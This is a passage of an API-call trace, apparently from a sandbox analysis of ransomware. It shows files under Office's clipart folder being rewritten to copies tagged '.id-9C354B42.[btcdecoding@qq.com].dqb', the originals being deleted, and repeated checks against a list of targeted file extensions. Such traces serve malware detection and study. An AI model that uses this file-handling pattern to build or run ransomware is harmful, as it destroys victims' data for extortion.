Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0059.071] GetLastError () returned 0x0 [0059.071] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x78c, lpOverlapped=0x0) returned 1 [0059.072] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x790, lpOverlapped=0x0) returned 1 [0059.073] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.073] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.073] SetEndOfFile (hFile=0x1e4) returned 1 [0059.073] CloseHandle (hObject=0x1e4) returned 1 [0059.073] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.073] SetEndOfFile (hFile=0x15c) returned 1 [0059.074] CloseHandle (hObject=0x15c) returned 1 [0059.074] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.074] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00437_.wmf")) returned 1 [0059.074] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0059.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0059.075] lstrlenW (lpString=".doc") returned 4 [0059.075] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.075] lstrlenW (lpString=".docx") returned 5 [0059.075] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.075] lstrlenW (lpString=".pdf") returned 4 [0059.075] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.075] lstrlenW (lpString=".xls") returned 4 [0059.075] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.075] lstrlenW (lpString=".xlsx") returned 5 [0059.075] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.075] lstrlenW (lpString=".ppt") returned 4 [0059.075] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0059.075] lstrlenW (lpString=".zip") returned 4 [0059.075] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.075] lstrlenW (lpString=".rar") returned 4 [0059.075] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.075] lstrlenW (lpString=".bz2") returned 4 [0059.075] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.075] lstrlenW (lpString=".7z") returned 3 [0059.075] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0059.075] lstrlenW (lpString=".dbf") returned 4 [0059.075] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0059.075] lstrlenW (lpString=".1cd") returned 4 [0059.075] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.075] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 63 [0059.075] lstrlenW (lpString=".jpg") returned 4 [0059.075] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.076] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.076] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0059.077] GetLastError () returned 0x0 [0059.077] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0xb88, lpOverlapped=0x0) returned 1 [0059.173] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xb90, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xb90, lpOverlapped=0x0) returned 1 [0059.183] ReadFile (in: hFile=0x15c, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.183] WriteFile (in: hFile=0x1e4, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.183] SetEndOfFile (hFile=0x1e4) returned 1 [0059.183] CloseHandle (hObject=0x1e4) returned 1 [0059.183] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.183] SetEndOfFile (hFile=0x15c) returned 1 [0059.184] CloseHandle (hObject=0x15c) returned 1 [0059.184] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.184] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00448_.wmf")) returned 1 [0059.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0059.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0059.231] lstrlenW (lpString=".doc") returned 4 [0059.231] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.231] lstrlenW (lpString=".docx") returned 5 [0059.231] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.231] lstrlenW (lpString=".pdf") returned 4 [0059.231] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.231] lstrlenW (lpString=".xls") returned 4 [0059.231] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.231] lstrlenW (lpString=".xlsx") returned 5 [0059.231] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.231] lstrlenW (lpString=".ppt") returned 4 [0059.231] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.231] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0059.231] lstrlenW (lpString=".zip") returned 4 [0059.231] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.231] lstrlenW (lpString=".rar") returned 4 [0059.232] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.232] lstrlenW (lpString=".bz2") returned 4 [0059.232] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.232] lstrlenW (lpString=".7z") returned 3 [0059.232] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0059.232] lstrlenW (lpString=".dbf") returned 4 [0059.232] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0059.232] lstrlenW (lpString=".1cd") returned 4 [0059.232] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.232] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00448_.WMF") returned 63 [0059.232] lstrlenW (lpString=".jpg") returned 4 [0059.232] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.251] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x317ff1c | out: lpFileSize=0x317ff1c*=2228) returned 1 [0059.251] CloseHandle (hObject=0x158) returned 1 [0059.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf")) returned 0x20 [0059.251] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0059.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0059.251] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.251] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.251] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.251] GetLastError () returned 0x0 [0059.252] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x8b4, lpOverlapped=0x0) returned 1 [0059.253] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x8c0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x8c0, lpOverlapped=0x0) returned 1 [0059.254] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.254] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.254] SetEndOfFile (hFile=0x180) returned 1 [0059.254] CloseHandle (hObject=0x180) returned 1 [0059.254] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.254] SetEndOfFile (hFile=0x158) returned 1 [0059.255] CloseHandle (hObject=0x158) returned 1 [0059.255] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.255] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01160_.wmf")) returned 1 [0059.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0059.255] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0059.255] lstrlenW (lpString=".doc") returned 4 [0059.255] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.255] lstrlenW (lpString=".docx") returned 5 [0059.256] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.256] lstrlenW (lpString=".pdf") returned 4 [0059.256] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.256] lstrlenW (lpString=".xls") returned 4 [0059.256] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.256] lstrlenW (lpString=".xlsx") returned 5 [0059.256] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.256] lstrlenW (lpString=".ppt") returned 4 [0059.256] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0059.256] lstrlenW (lpString=".zip") returned 4 [0059.256] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.256] lstrlenW (lpString=".rar") returned 4 [0059.256] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.256] lstrlenW (lpString=".bz2") returned 4 [0059.256] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.256] lstrlenW (lpString=".7z") returned 3 [0059.256] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0059.256] lstrlenW (lpString=".dbf") returned 4 [0059.256] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0059.256] lstrlenW (lpString=".1cd") returned 4 [0059.256] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.256] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01160_.WMF") returned 63 [0059.256] lstrlenW (lpString=".jpg") returned 4 [0059.256] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.257] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.257] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.257] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.257] GetLastError () returned 0x0 [0059.257] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x820, lpOverlapped=0x0) returned 1 [0059.259] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x830, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x830, lpOverlapped=0x0) returned 1 [0059.260] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.260] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.260] SetEndOfFile (hFile=0x180) returned 1 [0059.260] CloseHandle (hObject=0x180) returned 1 [0059.260] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.260] SetEndOfFile (hFile=0x158) returned 1 [0059.261] CloseHandle (hObject=0x158) returned 1 [0059.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.261] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01167_.wmf")) returned 1 [0059.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0059.261] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0059.261] lstrlenW (lpString=".doc") returned 4 [0059.261] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.261] lstrlenW (lpString=".docx") returned 5 [0059.261] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.261] lstrlenW (lpString=".pdf") returned 4 [0059.262] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.262] lstrlenW (lpString=".xls") returned 4 [0059.262] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.262] lstrlenW (lpString=".xlsx") returned 5 [0059.262] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.262] lstrlenW (lpString=".ppt") returned 4 [0059.262] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0059.262] lstrlenW (lpString=".zip") returned 4 [0059.262] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.262] lstrlenW (lpString=".rar") returned 4 [0059.262] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.262] lstrlenW (lpString=".bz2") returned 4 [0059.262] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.262] lstrlenW (lpString=".7z") returned 3 [0059.262] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0059.262] lstrlenW (lpString=".dbf") returned 4 [0059.262] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0059.262] lstrlenW (lpString=".1cd") returned 4 [0059.262] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01167_.WMF") returned 63 [0059.262] lstrlenW (lpString=".jpg") returned 4 [0059.262] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.263] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.263] GetLastError () returned 0x0 [0059.263] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x7d4, lpOverlapped=0x0) returned 1 [0059.264] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x7e0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x7e0, lpOverlapped=0x0) returned 1 [0059.265] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.265] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0xec, lpOverlapped=0x0) returned 1 [0059.265] SetEndOfFile (hFile=0x180) returned 1 [0059.265] CloseHandle (hObject=0x180) returned 1 [0059.265] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.266] SetEndOfFile (hFile=0x158) returned 1 [0059.266] CloseHandle (hObject=0x158) returned 1 [0059.266] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0059.266] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01168_.wmf")) returned 1 [0059.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0059.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0059.267] lstrlenW (lpString=".doc") returned 4 [0059.267] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0059.267] lstrlenW (lpString=".docx") returned 5 [0059.267] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0059.267] lstrlenW (lpString=".pdf") returned 4 [0059.267] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0059.267] lstrlenW (lpString=".xls") returned 4 [0059.267] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0059.267] lstrlenW (lpString=".xlsx") returned 5 [0059.267] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0059.267] lstrlenW (lpString=".ppt") returned 4 [0059.267] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0059.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0059.267] lstrlenW (lpString=".zip") returned 4 [0059.267] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0059.267] lstrlenW (lpString=".rar") returned 4 [0059.267] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0059.267] lstrlenW (lpString=".bz2") returned 4 [0059.267] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0059.267] lstrlenW (lpString=".7z") returned 3 [0059.267] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0059.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0059.267] lstrlenW (lpString=".dbf") returned 4 [0059.267] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0059.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0059.267] lstrlenW (lpString=".1cd") returned 4 [0059.267] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0059.267] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01168_.WMF") returned 63 [0059.267] lstrlenW (lpString=".jpg") returned 4 [0059.268] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0059.268] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.268] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x317fec8 | out: lpNewFilePointer=0x0) returned 1 [0059.269] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01169_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01169_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0059.269] GetLastError () returned 0x0 [0059.269] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x7e4, lpOverlapped=0x0) returned 1 [0059.270] WriteFile (in: hFile=0x180, lpBuffer=0x3ca0020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x317fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesWritten=0x317fc9c*=0x7f0, lpOverlapped=0x0) returned 1 [0059.271] ReadFile (in: hFile=0x158, lpBuffer=0x3ca0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x317fed4, lpOverlapped=0x0 | out: lpBuffer=0x3ca0020*, lpNumberOfBytesRead=0x317fed4*=0x0, lpOverlapped=0x0) returned 1 [0059.271] WriteFile (in: 